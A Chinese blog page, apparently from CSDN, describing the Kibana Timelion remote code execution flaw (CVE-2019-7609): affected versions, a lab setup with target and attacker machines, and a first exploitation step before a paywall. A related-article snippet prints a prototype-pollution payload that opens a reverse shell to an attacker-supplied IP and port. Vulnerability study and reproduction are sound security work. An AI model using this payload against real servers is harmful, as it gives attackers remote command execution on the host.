Kibana远程代码执行漏洞攻击方法和漏洞原理分析

最新推荐文章于 2025-10-03 02:08:43 发布
原创 最新推荐文章于 2025-10-03 02:08:43 发布 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞 #大数据 #网络安全

本文深入分析了Kibana的远程代码执行漏洞,涉及版本5.6.15和6.6.0之前的全部版本。攻击者能通过Timelion模块以Kibana权限执行任意代码。文章详细介绍了漏洞利用步骤、机理,以及危害分析和防护建议,包括环境搭建、payload构造等。

在这里插入图片描述

漏洞简介

Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell。

环境搭建

领取相关学习资料

靶机环境:

Parrot Security OS 4.7 64位 或其他类Linux操作系统(VMWare 14)

Elasticsearch6.5.4

Kibana 6.5.4

IP:10.10.10.128

攻击机环境:

Windows 10 Home 64位

Netcat 1.12 64位

Chrome浏览器

IP:172.16.2.62

漏洞利用

领取相关学习资料

1)在靶机上部署Kibana 和Elasticsearch,并开放访问端口(./config/kibana.xml中的server.host改成0.0.0.0)让攻击机可以访问(如图1所示)。

最低0.47元/天 解锁文章
漏洞预警:Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)
yuanlirong22的专栏
03-07 1413
Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)。允许攻击者操纵应用程序的JavaScript对象属性,可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.08.17.1之间的版本中,该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.18.17.2中,它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用。
CVE-2025-25014(CVSS 9.1):Kibana原型污染漏洞可导致远程代码执行
FreeBuf_的博客
05-08 538
Kibana原型污染漏洞(CVE-2025-25014)可致RCE,速升级!
插件安全实战:Kibana代码审计与漏洞防护指南
最新发布
gitblog_01029的博客
10-03 236
作为Elastic Stack可视化窗口,Kibana插件生态系统在扩展功能的同时也引入了安全风险。本文将从代码审计流程、常见漏洞类型防护策略三个维度,帮助开发者构建更安全的插件。 ## 安全审计基础框架 Kibana安全插件提供了完整的权限控制体系,核心实现位于[x-pack/plugins/security/server/authorization](https://link.gitco...
未授权访问漏洞系列详解③!
muyuchen110的博客
08-05 1536
【代码】未授权访问漏洞系列详解③!
【严重】Kibana 8.7.0 任意代码执行漏洞
murphysec的博客
05-23 1503
Kibana是用于Elasticsearch的数据可视化仪表板。Kibana在8.7.0版本引入了Synthetic监控功能,用户可配置编写playwright中的javascript代码实现web应用监控。 具备Kibana登录权限的攻击者可利用此功能编写恶意playwright脚本, 从而在Kibana主机中执行任意系统命令。
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 1027
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
CVE-2019-7609:Kibana远程代码执行漏洞复现
黑白的博客
11-15 5012
声明 好好学习,天天向上 漏洞描述 Kibana 是为 Elasticsearch设计的开源分析可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析可视化,以图标的形式展现出来。 攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。 影响范围 Kibana < 6.6.1 Kibana < 5.6.15
未授权访问漏洞下(漏洞复现合集)
2301_76631050的博客
08-05 3239
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。访问/env端点获取全部环境属性,由于actuator 会监控站点 mysql、mangodb 之类的数据库服务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公网,那么造成的危害是巨大的。
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1715
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6566
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
EC_Carrot的博客
07-08 434
影响范围 Kibana < 5.6.15 Kibana < 6.6.1 漏洞复现 在Timelion界面填入如下Payload: .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/your_ip/1234 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='-
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
weixin_33726318的博客
01-02 619
不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana 6.4.3之前版本5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻击、任意文件读取攻击、配合第三方应用反弹SHELL攻击,下文笔者对其漏洞背景、攻击原理行为进行分析复现。 0X01 影响范围 Elasticsearch Kibana是荷兰Elasticsea...
kibana 漏洞收集总结
sojrs_sec的博客
12-31 8116
一:cve-2019-7609 命令执行 Kibana存在远程代码执行漏洞,影响版本为5.6.156.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell 访问 http://ip:5601/app/timelion 输入payload .es(*).props(label.__proto__.env.AAAA='...
Kibana未授权访问漏洞
lhdbk______的博客
08-05 1091
Kibana未授权访问漏洞
kibana漏洞复现
Shanfenglan's blog
11-30 2837
文章目录1. kibana是什么2. CVE-2018-17246 文件包含漏洞2.1 利用3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)3.1 利用 1. kibana是什么 一般与Elasticsearch一起工作,作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用,可以通过5601端口去访问。 2. CVE-2018-17246 文件包含漏洞 影响版本: 5.6.13到6.4.3 2.1 利用 通常情况下Kibana
Kibana本地文件包含漏洞(CVE-2018-17246)复现
玄道的网安博客
03-09 2698
漏洞概述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 环境搭建 这里使用docker进行安装 https://github.c...
漏洞预警 | Elastic Kibana 存在任意代码执行漏洞(CVE-2025-25012)
C20220511的博客
03-14 847
Kibana版本8.17.18.17.2中只有拥有包含以下所有权限的角色才能利用此漏洞:fleet-all、integrations-all以及actions:execute-advanced-connectors。据描述,该漏洞源于原型污染问题,攻击者可通过精心设计的文件上传特制的 HTTP 请求执行任意代码,获取服务器敏感数据,进而控制整服务器。Elastic Kibana 8.17.3 版本已解决 CVE-2025-25012 漏洞,并强烈敦促所有用户尽快升级到此版本。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值